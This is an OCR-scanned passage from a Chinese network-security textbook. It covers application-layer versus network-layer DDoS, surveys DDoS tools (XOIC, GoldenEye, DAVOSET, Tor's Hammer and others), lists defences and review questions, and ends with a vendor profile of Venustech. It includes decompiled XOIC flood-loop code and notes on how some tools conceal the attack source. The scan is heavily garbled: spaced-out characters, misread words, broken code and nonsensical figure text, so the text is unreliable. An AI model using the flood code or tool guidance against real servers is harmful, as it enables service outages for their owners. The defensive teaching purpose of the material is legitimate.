攻击 者 控制 的 一 类 主机 ,同时 攻击 者 通过 这 类 主机 来 对 真正 实施 攻击 的 一 类 主机 进行 控 
制 , 主 控 机 在 这 些 被 称 为 俐 儒 机 的 上 面 安装 了 用 于 攻击 的 程序 ,攻击 者 通过 主 控 机 来 发 
送 特殊 的 指令 ,以 指示 倪 介 机 实行 对 攻击 目标 的 攻击 。 倪 人 血 机 , 倪 偶 机 同样 也 是 攻击 者 
控制 的 一 类 主机 , 倪 偶 机 是 真正 发 起 攻击 的 攻击 源 , 它 们 接受 和 运行 主 控 机 发 来 的 命令 ， 
发 起 攻击 。 

应 用 层 DDoS 攻击 和 传统 的 网 络 层 DDoS 攻击 之 间 存 在 着 较 大 的 差别 ,很 多 网 络 层 
DDoS 攻击 的 特性 在 应 用 层 DDoS 攻击 中 已 经 不 复 存在 了 ,这 两 类 攻击 的 具体 差别 体现 
在 以 下 几 个 方面 : 

(1) 两 者 实现 的 层次 不 同 。 

网 络 层 DDoS 攻击 发 生 在 低层 ,而 应 用 层 DDoS 攻击 利用 了 高 层 协议 实现 。 网 络 层 
DDoS 攻击 的 典型 攻击 方式 是 ,攻击 者 使 用 虚假 的 IP 地 址 来 控制 攻击 节点 ,然后 由 被 控 
制 的 攻击 节点 向 目标 主机 发 送 大 量 的 攻击 数据 包 , 这 些 数 据 包 包括 UDP 和 ICMP 等 , 同 
时 这 种 攻击 方式 将 会 利用 TCP 协议 三 次 握手 机 制 的 缺点 ,使 得 攻击 目标 在 收 到 这 些 不 
存在 的 IP 地 址 的 连接 请 求 之 后 ,为 了 维护 一 个 开销 非常 大 的 半 开 连接 而 需要 消耗 大 量 
的 CPU 和 内 存 资源 ,最 终 将 导致 无 法 再 为 用 户 提供 服务 。 而 应 用 层 DDoS 则 不 然 , 以 
Web 服务 为 例 ,基于 Web 的 应 用 (如 HTTP 和 HTTPS) 通 过 开放 的 TCP 端口 为 客户 提 
供 服 务 ,应 用 层 DDoS 攻击 利用 了 高 层 的 协议 ,其 攻击 得 以 实现 是 以 正常 TCP 连接 和 IP 
分 组 为 前 提 , 因 此 这 就 不 具备 传统 DDoS 攻击 的 行为 特征 (以 TCP 半 开 放 连 接 最 为 显 
著 ) ,而 且 它 无 法 采用 虚假 的 IP 地 址 (利用 虚假 的 IP 地 址 将 无 法 建立 合法 和 有 效 的 TCP 
连接 ) 的 方法 。 因 为 基于 网 络 层 的 检测 系统 很 难 对 高 层 的 行为 进行 判断 ,所 以 系统 就 无 
法 判断 经 过 这 些 端口 的 用 户 请 求 由 正常 用 户 还 是 攻击 者 发 出 的 ,因此 针对 高 层 协议 的 应 
用 层 DDoS 攻击 的 请 求 可 以 顺利 穿越 基于 低层 协议 的 检测 系统 。 

(2) 应 用 层 有 更 多 更 复杂 的 形式 。 

以 Web 服务 器 为 例 , 它 可 以 提供 诸如 数据 库 查 询 、 客 户 端 服 务 端的 交互 等 服务 ,所 
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以 攻击 者 通过 大 量 倪 儒 机 向 攻击 目标 主机 发 送 请 求 数据 包 的 攻击 方式 并 不 是 应 用 层 
DDoS 攻击 的 主流 攻击 方式 ,相反 ,应 用 层 DDoS 攻击 可 以 用 低速 率 的 请 求 .少量 的 攻击 
节点 来 实现 攻击 效果 。 从 这 点 上 来 看 ,应 用 层 的 DDoS 攻击 远 比 网 络 层 DDoS 攻击 来 的 
复杂 , 它 可 以 实现 更 多 的 功能 。 因 此 ,应 用 层 DDoS 攻击 可 以 产生 更 大 的 破坏 力 。 这 种 
以 简单 的 HTTP 请 求 就 可 以 触发 服务 器 执行 一 系列 复杂 操作 的 攻击 方式 是 应 用 层 和 网 
络 层 DDoS 攻击 的 差异 之 一 。 


2. DDoS 攻击 与 测试 工具 


按 DDoS 攻击 的 趋势 逐渐 分 为 小 流量 攻击 与 大 流量 攻击 ,无 论 是 大 流量 攻击 还 是 小 
流量 攻击 ,他们 都 需要 一 些 工 具 进行 辅助 。 那 么 DDoS 攻击 常用 的 工具 有 哪些 呢 ? 

1) XOIC 

相对 于 LOIC 的 多 平台 (GNU/Linux、Windows、Mac OS 以 及 Android) ,XOIC 可 运 
行 的 环境 则 少 得 多 , 仅 支 持 Windows 7 以 上 的 Windows 平台 。 它 可 以 根据 用 户 选 择 的 
端口 与 协议 执行 攻击 任何 服务 器 。XOIC 开发 者 还 声称 XOIC 比 上 面 的 LOIC 在 很 多 方 
面 更 强大 。 一 般 来 说 ,该 工具 有 三 种 攻击 模式 : 第 一 个 被 称 为 测试 模式 ;第 二 个 是 正常 的 
DOS 攻击 模式 ;最 后 一 个 是 带 有 HTTP / TCP / UDP / ICMP 消息 的 DOS 攻击 模式 。 
其 反 编译 后 的 关键 代码 如 图 3. 28 所 示 。 


1f (this.1istBoxl. SelectedItem. ToString() == "Tcp") 


while (true) 
{ 


Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 
IPEndPoint remoteEP = new IPEndPoint(IPAddress.Parse(text), (int)Convert.ToInt16(text2)); 
socket .Connect(remoteEP); 
socket.Close(); 

Application.DoEvents(); 

人 


} 
else 
if (this.listBoxl.SelectedItem, ToString() == "Icmp") 
while (true) 
{ 
Ping arg_182 9 = new Ping(); 
PingOptions pingOptions = new ts 
Pingoptions: Rn 入 = true 
string s 
byte[] bytes = Encoding.ASCII. GetBytes(s); 
PingReply pingReply = arg_182 9.Send(text, 129, bytes, pingOptions); 
Application.DoEvents(); 
else 


{ 
if (this.listBoxl.SelectedItem. ToString() == "Udp") 


byte[] bytes2 = Encoding.ASCII.GetBytes("~hio(hah~"); 
while (true) 
{ 


IpEndPoint endpoint = new IpEndpoint(IPAddress.Parse(text), (int)Convert.ToInt16(text2)); 


2 
arg_213_9. ee xpr_211, expr_211.Length); 
udpClient.Close(); 


3.28 XOIC 关键 代码 


2) Zarp 
Zarp 是 采用 Python 编写 的 、 类 似 MSF 的 一 款 网 络 攻 击 测试 框架 。Zarp 主要 接口 
是 一 个 CLI 驱动 的 图 形 界面 ,采用 多 层 菜 单 ,使 用 起 来 相当 方便 。 目 前 运行 平台 只 限于 
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linux, 同 时 在 安装 之 前 要 确保 系统 存在 python2. 7. x、git 以 及 scapy。 工 具 采 用 模块 化 设 
计 , 并 且 内 置 多 款 嗅 探 器 ,用 户 能 够 嗅 探 各 种 数据 包 , 并 进行 ARP Spoof、DNS Spoof、 
DHCP Spoof 等 渗透 测试 。 该 工具 还 包括 各 种 路 由 器 的 exp, 如 switch flooding、ARP 
shells ,access point cracking ,等 等 。 

3) Slowhttptest 

Slowhttptest 是 一 个 可 配置 的 应 用 层 拒绝 服务 攻击 测试 工具 ,主要 用 于 慢 速 攻击 测 
试 , 它 包含 了 多 种 流行 的 攻击 方式 ,如 slowloris、slow http post 以 及 slow read attack 等 。 
它 可 以 工作 在 Linux,OSX 和 Cygwin 环境 以 及 Windows 命令 行 接口 ,可 以 帮助 安全 测 
试 人 员 检 验 服务 器 对 慢 速 攻击 的 处 理 能 力 。 这 个 工具 可 以 模拟 低 带 宽 耗费 下 的 DoS 攻 
击 , 比 如 慢 速 攻击 , 慢 速 HTTP POST, 通 过 并 发 连接 池 进 行 的 慢 速 读 攻 击 ( 基 于 TCP 持 
久 时 间 ) 等 。 慢 速 攻击 基于 HTTP 协议 ,通过 精心 的 设计 和 构造 ,这 种 特殊 的 请 求 包 会 造 
成 服务 器 延 时 ,而 当 服务 器 负载 能 力 消耗 过 大 即 会 导致 拒绝 服务 。 

4) GoldenEye 

GoldenEye( 最 新 版 本 为 2.1) 是 一 个 主打 应 用 层 (http flood) 攻 击 的 工具 ,从 Hulk 项 
目 发 展 而 来 , 同 Hulk 一 样 它 也 使 用 python 编写 ,支持 多 平台 运行 ,攻击 方式 上 支持 http 
get .http post 和 random。 工 具 支持 KeepAlive 和 NoCache 功能 ;支持 随机 化 的 http 
header; 可 定义 的 User-Agent 列表 (默认 随机 ); 支 持 Android(GoldenEye 4 Android) 平 
台 等 。 虽然 测试 效果 不 错 ,但 它 不 能 隐藏 攻击 源 ; 其 次 ,频繁 的 ,傻瓜 式 的 直 连 请 求 很 难 
突破 目标 主机 交互 性 的 防护 措施 。 这 种 工具 的 适用 场景 更 多 的 是 有 针对 性 的 、 可 控 的 实 
验 室 性 质 的 压力 测试 ,这 也 是 作者 开发 工具 的 初衷 。 

5) DAVOSET 

DAVOSET( 最 新 版 本 为 1.2) 是 一 个 很 好 的 执行 DDOS 攻击 工具 ,最 新 版 本 的 工具 
新 增 支持 cookie 以 及 许多 其 他 功能 。 可 以 从 Packetstormsecurity DAVOSET 免费 下 
载 。DAVOSET 是 一 个 perl 脚本 ,有 perl 执行 环境 即 可 。 与 前 面 介绍 的 直 连 式 的 
GoldenEye 不 同 , 它 又 被 称 之 为 Proxy Attacks ,是 借助 有 漏洞 的 、 合 法 的 第 三 方 身份 实施 
攻击 而 做 到 自身 的 隐藏 ,可 以 看 作 是 更 广泛 意义 上 的 反射 攻击 。 而 且 Proxy Attacks 可 
利用 的 反射 点 众多 , 也 使 得 这 种 攻击 更 加 难以 封 堵 。 它 可 以 利用 代理 发 动 攻击 ,一定 程 
度 上 可 以 隐藏 自身 ;不 定期 更 新 可 用 的 反射 点 ;反射 点 通常 有 较 强 的 可 交互 性 ,容易 绕 过 
目标 防护 措施 。 

6) Tor’s Hammer 

Tor’s Hammer( 最 新 版 本 为 1.0) 的 原始 版 本 于 2011 年 由 Packet Storm Security 开 
发 完成 ,是 一 个 基于 python 的 、 可 多 平台 运行 的 ,主打 post 慢 速 攻击 的 压力 测试 工具 , 针 
对 的 是 有 漏洞 的 Apache 服务 器 ,可 以 通过 TOR 匿名 网 络 执行 攻击 ( 需 安装 TOR 并 监听 
于 127. 0. 0.1:9050)。 鉴 于 Tor”s Hammer 工具 已 不 再 更 新 ,An0nsec 黑客 组 织 于 2012 
年 开发 出 了 增强 版 的 Tor”s Hammer 666, 并 将 其 用 于 诸如 OpUSA、OpPetrol 以 及 
OPpIsrael 的 攻击 活动 中 。 

以 上 工具 都 是 现在 较为 流行 的 DoS 与 DDoS 工具 ,并 且 在 网 上 都 很 容易 取得 。 
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3. DDoS 防护 


在 此 ,预防 策略 只 是 减少 了 遭受 DDoS 攻击 的 可 能 性 ,并 不 能 完全 预防 DDoS 攻击 。 

1) 数据 包 过 滤 

这 一 点 相当 重要 。 建 议 使 用 向 外 向 内 两 种 过 滤 。 向 外 过 滤 防 止 IP 欺骗 ,检查 边界 
安全 规则 ,确保 输出 的 包 受 到 正确 限制 ,将 不 是 来 源 于 内 部 网 络 的 信息 包 过 滤 掉 ,但 这 对 
于 已 经 入 侵 内 部 机 器 从 内 部 发 动 的 进攻 无 效 。 向 内 过 滤 , 过 滤 目 标 地 址 是 本 网 广播 地 址 
的 数据 包 , 过 滤 源 地 址 与 内 部 网 上 地 址 相同 的 数据 包 。 过 滤 源 地 址 是 RCF 中 列 出 地 址 
的 包 。 过 滤 TCP/IP 中 Fragment offset 二 1 的 包 预 防 极 小 数据 攻击 。 针 对 各 DDoS 攻击 
主 控 端 和 代理 端 通信 的 特色 , 包 过 滤 还 包括 特征 值 过 滤 , 如 果 过 滤 防 火 墙 和 路 由 器 上 的 
ICMP 消息 ,就 封锁 了 利用 ICMP 协议 进行 消息 传递 的 主 控 端 和 代理 端的 通信 和 渠道。 但 
这 样 会 影响 所 有 要 使 用 这 些 功能 的 Internet 程序 .例如 ping。 另 外 ,值得 一 提 的 是 ,数据 
段 内 容 只 包含 文字 和 数字 字符 的 数据 包 , 如 没有 空格 .标点 和 控制 字符 。 这 往往 是 数据 
经 过 BASE64 编码 后 而 只 含有 base64 字符 集 字 符 的 特征 。 所 以 ,检测 到 此 类 数据 包 也 值 
得 注意 。 

2) 带宽 限制 、 负 载 均衡 

使 用 CAP 限制 SYN ICMP 数据 包 流 量 。 使 用 防火 墙 .路 由 器 分 离 流 量 。 

3) 安装 防火 墙 

一 些 优秀 的 防火 墙 产 品 都 内 置 了 抗 DoS 模块 ,采用 诸如 Syn Proxy、Syn cookie 或 类 
似 的 算法 可 以 进行 有 限 类 型 的 拒绝 服务 攻击 的 防护 。 如 前 分 析 , 代 理 型 防火 墙 对 Syn 
Flood DDoS 攻击 也 有 一 定 的 预防 作用 。 本 书 将 在 下 一 章 介绍 许多 优秀 的 防护 设备 ,其 
中 就 有 专门 对 抗 DoS 攻击 的 设备 。 

4) 增加 系统 资源 ,扩充 主机 集群 数量 

通过 提高 主机 集群 的 响应 能 力 来 被 动 缓解 攻击 。 但 这 种 做 法 在 面临 高 强度 DDOS 
攻击 的 时 候 ,其 资源 耗费 和 维护 成 本 的 增加 往往 是 无 止境 的 。 

5) 优化 操作 系统 参数 

比如 减少 连接 等 待 时 间 ,增加 连接 队列 缓冲 ,减少 和 取消 服务 端 连 接 重 试 次 数 。 

6) 禁 IP 直播 ,防止 SMUREF 攻击 

在 响应 方面 ,由 于 在 受到 DDoS 攻击 的 过 程 中 ,几乎 没有 可 用 带宽 ,因而 很 难 做 直接 
实时 地 响应 反击 。 

最 后 ,不论 是 预防 还 是 响应 DDoS 攻击 ,都 有 必要 与 Internet 服务 提供 商 (ISP) 协 调 ， 
如 实现 路 由 的 访问 控制 ,对 带宽 总 量 的 限制 。 不 同 的 访问 地 址 在 同一 时 间 对 带宽 的 占有 
率 限制 ,不 仅 可 以 在 ISP 这 个 层次 上 进行 预防 ,还 可 以 快速 响应 针对 ISP 和 周边 网 络 之 
间 带 宽 的 攻击 。 分 析 受 影响 的 系统 ,确定 涉及 的 其 他 节点 ,从 而 阻挡 已 知 攻击 节点 的 流 
量 , 并 追踪 攻击 者 。 如 果 有 可 能 ,最 好 请 ISP 监视 网 络 流量 。 
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33 刁 题 


(1) 开放 系统 互 连 参 考 模型 (Open System Interconnect,OSI) 由 低 到 高 分 为 哪 
几 层 ? 

(2) 请 简 述 TCP/IP 的 参考 模型 与 开放 系统 互 连 参 考 模型 (OSI) 层 之 间 的 对 应 

(3) 计算 机 网 络 的 拓扑 结构 有 哪些 ? 

(4) 请 简 述 常见 网 络 设备 的 工作 原理 及 其 安全 威胁 。 

(5) 请 简 述 跨 站 脚本 攻击 (XSS) 原 理 。 

(6) 如 何 防御 跨 站 请 求 伪造 (CSRF)? 

(7) SQL 注入 的 种 类 有 哪些 ? 

(8) 请 简 述 SQL 注入 流程 。 

(9) 请 简 述 点 击 支持 (Clickjacking) 原 理 。 

(10) 请 简 述 应 用 层 DDoS 攻击 和 传统 的 网 络 层 DDoS 攻击 之 间 存 在 的 差别 。 
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41 北京 启明 星 长 信息 技术 股份 有 限 公 司 


启明 星辰 信息 技术 有 限 公 司 成 立 于 1996 年 ,由 留美 博士 严 望 佳 女士 创建 ,是 一 家 拥 
有 自主 知识 产权 的 网 络 安全 高 科技 企业 。 作 为 与 国际 接轨 、 勇 于 创新 的 先行 者 ,启明 星 
展 公 司 致力 于 提供 具有 国际 竞争 力 的 自主 创新 的 安全 产品 和 最 佳 实践 服务 ,帮助 客户 全 
面 提升 其 IT 基础 设施 的 安全 性 和 生产 效能 。 凭 借 雄 厚 的 技术 研发 实力 ,启明 星辰 公司 
已 经 发 展 成 为 以 人 侵 检 测 系列 化 产品 为 核心 ,具有 国际 一 流水 平 的 中 国 网 络 安全 产品 研 
发 与 生产 基地 ,并 在 此 基础 上 推出 了 漏洞 扫描 、 安 全 评测 .安全 审计 、 安 全 取证 .恶意 代码 
查 杀 .宏观 监测 ` 风 险 评估 等 安全 产品 和 工具 。 研 制 开 发 了 以 人 侵 管 理 技术 为 核心 的 ”人 
侵 检 测 管 理 平台 ” ,构筑 了 包括 防火 墙 , 入 侵 监测 漏洞 扫描 、 入 侵 取证 物理 隔离 检查 、 主 
机 保护 、 安 全 审计 、 防 病毒 .网 管 系统 、 灾 难 备份 等 安全 设备 在 内 的 整体 网 络 安全 主动 防 
御 体 系 。 


411 基本 情况 


该 公司 位 于 北京 中 关 村 软件 园 的 启明 星 展 大 厦 ,目前 是 我 国 规模 最 大 的 国家 级 网 络 
安全 研究 基地 ;创造 了 百 余 项 专利 和 软件 著作 权 ,参与 制定 国家 及 行业 网 络 安全 标准 , 填 
补 了 我 国信 息 安 全 科研 领域 的 多 项 空白 ;完成 包括 国家 发 改 委 产业 化 示范 工程 ,国家 科 
技 部 863 计划 、 国 家 科技 支撑 计划 等 国家 级 科研 项 目 近 百 项 。 作 为 信息 安全 行业 的 领军 
企业 ,启明 星辰 以 用 户 需 求 为 根本 动力 ,研究 开发 了 完善 的 专业 安全 产品 线 。 通 过 不 断 
耕耘 ,已 经 成 为 在 政府 .电信 、 人 金融、 能源、 交通 .军队 .军工 .制造 等 国内 高 端 企业 级 客户 
的 首选 品牌 。 启 明星 辰 在 政府 和 军队 拥有 80% 的 市 场 占 有 率 ,为 世界 五 百 强 中 60% 的 
中 国企 业 客户 提供 安全 产品 及 服务 ;在 金融 领域 ,启明 星辰 对 政策 性 银行 .国有 控股 商业 
银行 、 全 国 性 股份 制 商 业 银行 实现 90% 的 履 盖 率 。 在 电信 和 领域 ,启明 星辰 为 中 国 移动 .中 
国电 信 、 中 国联 通 三 大 运营 商 提供 安全 产品 .安全 服务 和 解决 方案 。2014 年 .启明 星 展 全 
年 实现 营业 收入 11. 96 亿 元 .营业 利润 1. 13 亿 元 归属 于 公司 股东 的 净利 润 1. 70 亿 元 ,分 
别 比 去 年 同期 增长 26.07% .210. 34% 和 39.19%。 业 绩 增长 的 主要 原因 是 报告 期 内 公司 业 
务 增长 及 并 人 北京 书生 电子 技术 有 限 公 司 与 杭州 合 众 数据 技术 有 限 公 司 的 部 分 损益 所 致 。 
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Mi:s 


412 发 展 历程 


1996 年 6 月 24 日 ,启明 星 展 公司 成 立 。 

1997 年 1 月 ,启明 星辰 研发 中 心 成 立 。 

1999 年 3 月 ,出 版 中 国 第 一 套 《 网 络 安全 系列 丛书 》, 开 展 中 国 最 早 的 安全 教育 培训 。 
同年 12 月 ,启明 星 展 “积极 防御 实验 室 ”(ADLAB) 成 立 。 

2000 年 1 月 ,党 和 国家 领导 人 江泽民 李岚清、 曾庆红 等 同志 亲切 视察 启明 星辰 公 
司 。 同 年 3 月 ,天 阁 入 侵 检测 系统 诞生 ,成 为 世界 上 第 一 款 硬件 IDS 产品 。 同 年 11 月 ， 
国内 第 一 家 网 络 安全 博士 后 工作 站 在 启明 星 展 公司 成 立 。 

2001 年 10 月 ,承担 中 国电 信 IP 网 网 络 安 全 风险 评估 项 目 , 正 式 进 入 电信 行业 网 络 
安全 服务 市 场 。 

2002 年 10 月 , 首 批 获得 中 国 国家 信息 安全 产品 测评 认证 中 心 公布 的 “信息 系统 安全 
服务 商 资 质 ”。 

2003 年 1 月 ,中 共 中 央 总 书记 胡锦涛 同志 亲切 接见 启明 星 展 公司 CEO 严 望 佳 博士 。 

2003 年 8 月 ,天 立信 侵 检 测 系 统 和 天 镜 网 络 漏洞 扫描 系统 同时 入 围 中 国人 民 银 行 、 
中 国 农业 银行 和 中 国 建设 银行 的 安全 产品 选 型 。 同 年 9 月 ,推出 天 镜 分 布 式 漏洞 扫描 与 
安全 评估 系统 ,填补 了 国内 相关 市 场 领域 的 空白 。 同 年 12 月 ,正式 推出 天 表 网 络 安全 审 
计 系 统 。 

2004 年 3 月 ,获得 ISO9001:2000 质量 管理 体系 认证 证 书 。 同 年 5 月 ,圆满 完成 “ 广 
东 移 动 2003 安全 评估 服务 项 目 ”, 全 面 进入 中 国 移动 市 场 。 同 年 7 月 ,党 支部 荣获 “北京 
市 先进 基层 党 组 织 ” 称 号 。 

2005 年 6 月 ,由 以 入侵 检测 产品 和 安全 服务 为 核心 的 安全 厂商 转变 为 包括 安全 全 线 
产品 、 可 信 管理 平台 以 及 M2S 专业 服务 的 综合 安全 产品 和 服务 提供 商 。 同 年 7 月 ,推出 
国内 第 一 款 自主 知识 产权 的 UTM 产品 天 清 汉 马 USG 多 功能 安全 网 关 。 同 年 9 
月 ,成 为 全 国 首 批 荣获 “ 涉 密 系统 集成 甲 级 资质 "的 15 家 企业 之 一 。 同 年 12 月 , 泰 合 中 
心 国家 广电 总 局 项 目 启动 ,标志 着 泰 合 信息 安全 运营 中 心 系统 成 为 国内 唯一 在 政府 \ 金 
融 \ 电 信和 ,能源 四 大 行业 均 有 成 功 部 署 实践 的 安全 管理 平台 类 产品 。 

2006 年 6 月 ,党 支部 被 中 组 部 授予 “全 国 先进 基层 党 组 织 " 称 号 。 同 年 7 月 ,被 科技 
部 认定 为 “国家 火炬 计划 重点 高 新 技术 企业 ”。 

2007 年 3 月 , 获 ( 人 民 日 报关 自主 创新 十 大 影响 的 品牌 ”大奖 。 同 年 4 月 ,当选 北京 
市 “ 百 家 创 新 试点 企业 ”。 同 年 5 月 .发布 完全 自主 知识 产权 的 UTM 产品 一 一 天 清 汉 马 
一 体 化 安全 网 关 。 同 年 6 月 ,以 第 一 名 的 成 绩 人 选 国家 级 应 急 服务 支撑 单位 。 同 年 12 
月 , 获 国 内 首 家 千 兆 IPS 涉 密 资质 。 

2008 年 3 月 ,启明 星辰 大 厦 获 土木 工程 最 高 奖项 “和 钴 天 佑 奖 "”。 同 年 3 月 ,启明 星辰 
CEO 严 望 佳 当选 全 国政 协 第 十 一 届 委 员 会 委员 。 同 年 5 月 ,启明 星辰 CEO 严 望 佳 荣获 
第 12 届 * 中 国 青年 五 四 奖章 ?标兵 。 同 年 5 月 ,向 四 川 地 震 灾 区 捐款 捐 物 200 多 万 元 ,成 
为 最 早 向 灾区 捐款 的 信息 安全 企业 之 一 。 同 年 7 月 , 首 批 获得 国家 最 高 级 信息 安全 应 急 
处 理 服务 资质 。 同 年 7 月 ,发 布 “ 安 星 远程 网 站 安全 检查 服务 ”产品 。 同 年 9 月 ,全 面 出 


Cs 网 络 安全 解决 方案 供应 商 及 产品 


169 


色 完 成 北京 2008 年 奥运 会 信息 安全 保障 任务 。 同 年 11 月 ,荣获 中 关 村 软件 产品 与 服务 
政府 采购 目录 入 选 证 书 。 同 年 12 月 .启明 星辰 CEO 严 望 佳 荣 获 中 关 村 二 十 大 领军 人 物 
奖 。 同 年 12 月 ,荣获 第 29 届 北 京 奥运 会 及 残 奥 会 信息 安全 保驾 护航 贡献 奖 。 

2009 年 1 月 ,荣获 促进 国家 安全 科学 技术 进步 工作 突出 贡献 集体 奖 。 同 年 3 月 , 荣 
获 2008 年 度 中 国企 业 信息 化 500 强 最 佳 信息 安全 产品 和 服务 提供 商 。 同 年 4 月 ,发 布 
UTM2 统一 安全 套件 ,将 网 络 威胁 终端 安 全 的 一 体 化 管理 .一 体 化 部 署 变 为 现实 。 同 年 
8 月 ,发 布 基于 多 核 架构 的 万 兆 UTM 产品 。 同 年 10 月 ,启明 星辰 荣获 国庆 成 立 60 周年 
网 络 与 信息 安全 保障 先进 单位 。 同 年 11 月 ,中 国 移动 安全 网 关 ( 防 火 墙 ) 全 球 采 集 , 天 清 
汉 马 万 兆 级 产品 是 唯一 入围 的 中 国信 息 安全 品牌 。 

2010 年 4 月 ,正式 发 布 天 阁 威 胁 检测 与 智能 分 析 系统 (TDS)。 同 年 6 月 ,启明 星 展 
在 深交 所 中 小 板 挂 牌 上 市 。 同 年 11 月 ,启明 星辰 被 认定 为 信息 安全 首 家 “国家 认定 企业 
技术 中 心 ”。 

2011 年 1 月 ,启明 星辰 董事 会 同意 筹划 以 非 公开 发 行 股份 及 以 现金 购买 北京 网 御 星 
云 信息 技术 有 限 公 司 资产 的 事项 。 同 年 6 月 ,泰和 SOC 安全 管理 平台 成 为 国内 首 家 获得 
中 国信 息 安 全 测评 中 心 颁发 的 EAL3 级 信息 技术 产品 安全 测评 证 书 的 产品 。 同 年 8 月 
获得 “信息 安全 服务 资质 证 书 ( 安 全 开发 类 一 级 )”。 同 年 11 月 ,与 神州 数码 进行 战略 合 
作 ,正式 签约 神州 数码 为 启明 星辰 产品 全 国 总 代理 。 

2012 年 5 月 ,启明 星辰 与 网 御 星 云 的 重大 资产 重组 获得 中 国 证 监 会 核准 。 同 年 5 
月 ,发 布 万 兆 WAF \ 万 兆 ADM ,全 线 产品 跨 入 万 兆 时 代 。 


413 主要 产品 


1. 统一 威胁 管理 (Unified Threat Management, UTM) 


天 清 汉 马 USG 一 体 化 安全 网 关 采 用 了 业界 最 先进 的 多 核 硬件 架构 和 一 体 化 的 软件 
设计 , 集 防 火 墙 \VPN 、 和 信 侵 防御 (Intrusion Prevention System,IPS) \、 防 病毒 、 上 网 行为 管 
理 、 内 网 安全 , 反 垃圾 邮件 、 抗 拒绝 服务 攻击 (Anti-DoS) 内 容 过 滤 等 多 种 安全 技术 于 一 
身 ,高 性 能 、 绿 色 低 碳 , 同 时 全 面 支持 各 种 路 由 协议 .QoS、 高 可 用 性 (HA). 日 志 审 计 等 功 
能 ,为 网 络 边界 提供 了 全 面 实 时 的 安全 防护 。 此 外 ,天 清 汉 马 USG 一 体 化 安全 网 关 支 持 
扩展 无 线 安全 模块 ,可 制定 多 维度 的 无 线 安全 准 入 策略 ,并 根据 所 制定 策略 实现 无 线 网 
络 的 访问 控制 。 天 清 汉 马 USG 一 体 化 安全 网 关 各 系列 及 部 分 功能 说 明 如 图 4. 1 所 示 。 

其 一 体 化 软件 架构 体系 如 图 4.2 所 示 。 

天 清 汉 马 USG 一 体 化 安全 网 关 安 全 解决 方案 如 图 4. 3 所 示 。 


2. 入 侵 检 测 (IDS) 


天 阁 入 侵 检测 与 管理 系统 是 启明 星 展 自 主 研发 的 入 侵 检测 类 安全 产品 ,其 主要 作用 
是 帮助 用 户 量化 、 定 位 来 自 内 外 网 络 的 威胁 情况 ,提供 有 针对 性 的 指导 措施 和 安全 决策 
依据 ,并 能 够 对 网 络 安 全 整体 水 平 进行 效 果 评 估 , 天 阁 入 侵 检测 与 管理 系统 采用 了 融合 
多 种 分 析 方 法 的 新 一 代入 侵 检 测 技术 .配合 经 过 安全 优化 的 高 性 能 硬件 平台 ,坚持 “全 面 
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万 交 高 六 设备 址 万 兆 设 竺 , 理 对 能 力 80G 
香 寺 40G. 15600GP 款 淮 8 个 扩展 覃 
EE .2 
蕊 12 万 交 


4000EP 系 列 


准 万 区 设备 , 要 时 10G。 
4000EPRLL4 扩 要 相 
重大 支持 39 干 间接 口 

L 2000DP 系 习 


看 娃 3.5G, 并 发 200 万 2UR 余 双 电 源 


吹 W6 个 干 兆 志 口 
+2、4 个 干 龙口 
EEC 
1008DP 
S et 
准 干 兆 系 列 [a Ss = 
i Bt26 
国 区 :we we] 了 多 *N 交 
图 4.1 天 清 汉 马 USG 一 体 化 安全 网 关 
监控 日 志 报警 配置 升级 HA CLI 
VPN 流量 控制 | | 访问 控制 应 用 防护 
认证 行为 管理 NS 
ms | sa | | | i [| 
VPN |‖ VPN 三 若 疝 瓦 世 及 胁 
优化 。 | | 主动 防御 | | 漏洞 扫描 p 件 | 一 | 特 
CQ | 征 
库 
统一 加 密 引擎 统一 控制 引擎 统一 检测 引擎 < 中 
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4.2 天 清 汉 马 USG 一 体 化 安全 网 关 一 体 化 软件 架构 体系 


检测 ` 有 效 呈 现 ” 的 产品 核心 价值 取向 ,可 以 依照 用 户 定制 的 策略 ,准确 分 析 、 报 告 网 络 中 
正在 发 生 的 各 种 异常 事件 和 攻击 行为 ,实现 对 网 络 的 “全 面 检测 ”, 并 通过 实时 的 报警 信 
息 和 多 种 格式 报表 ,为 用 户 提供 翔实 、 可 操作 的 安全 建议 ,帮助 用 户 完善 安全 保障 措施 ， 
确保 将 信息 “有 效 呈 现 ? 给 用 户 。 同 时 ,天 疗 和 人 侵 检 测 与 管理 系统 支持 扩展 无 线 安全 模 
块 ,可 准确 识别 各 类 无 线 安全 攻击 事件 , 按 不 同安 全 级 别 实 时 告警 ,并 据 此 生成 多 种 统计 
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应 用 识别 模块 | | URL 本 地 查询 AVIPS 引 擎 主动 防御 “| 你 特征 开发 
1 | 一 = 
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4.3 天 清 汉 马 USG 一 体 化 安全 网 关 安全 解决 方案 


报表 ,提供 有 线 、 无 线 网 络 攻击 检测 整体 解决 方案 。 

其 功能 特点 可 概括 为 : 全 面 检测 ,有 效 呈 现 。 

(1) 全 面 检测 包含 如 下 内 容 : 全 面 信息 收集 ,支持 多 级 .分布 式 部 署 ,实现 策略 统一 
下 发 ,信息 集中 收集 ;全 面 协议 分 析 ,支持 协 议 自 识别 与 协议 插件 技术 ,可 准确 识别 非常 
规 端口 的 协议 和 新 型 协议 ;全 面 检测 机 制 , 支 持 基 于 特征 和 基于 原理 的 两 种 检测 方式 ,在 
保障 检测 精度 的 基础 上 ,扩大 了 检测 可 识别 的 范围 ;全 面 事件 分 析 , 启 明星 展 有 一 套 业 界 
最 规范 的 后 继 服务 支撑 体系 ,确保 对 新 型 事件 的 快速 准确 响应 ;全 面 检测 范围 ,提供 网 络 
入 侵 事 件 、 网 络 违 规 事 件 .流量 异常 事件 等 多 种 异常 检测 ;全面 检测 性 能 ,采用 最 短 时 间 
优先 算法 ,确保 了 产品 在 网 络 数据 高 负载 情况 下 的 检测 效率 。 

(2) 有 效 呈 现 包含 如 下 内 容 : 精确 报警 信息 ,结合 了 环境 指纹 技术 ,在 发 现 有 攻击 行 
为 后 ,与 存储 的 环境 信息 进行 二 次 匹配 ,将 那些 能 够 确信 为 “有 用 ”的 报警 信息 单独 呈现 ， 
减少 用 户 的 分 析 操 作 消 耗 ; 详 尽 信息 呈现 ,报警 信息 除了 事件 的 双方 地 址 、 协 议 等 信息 
外 ,还 包括 了 对 事件 的 具体 描述 、 漏 洞 信息 、 修 补 建议 .影响 系统 等 ,可 以 将 最 细致 的 事件 
dd hit ae te nie 
部 署 的 情况 下 ,可 以 将 设备 拓扑 与 地 理 拓扑 相 结合 ,使 得 管理 员 可 以 直观 而 迅速 地 判断 
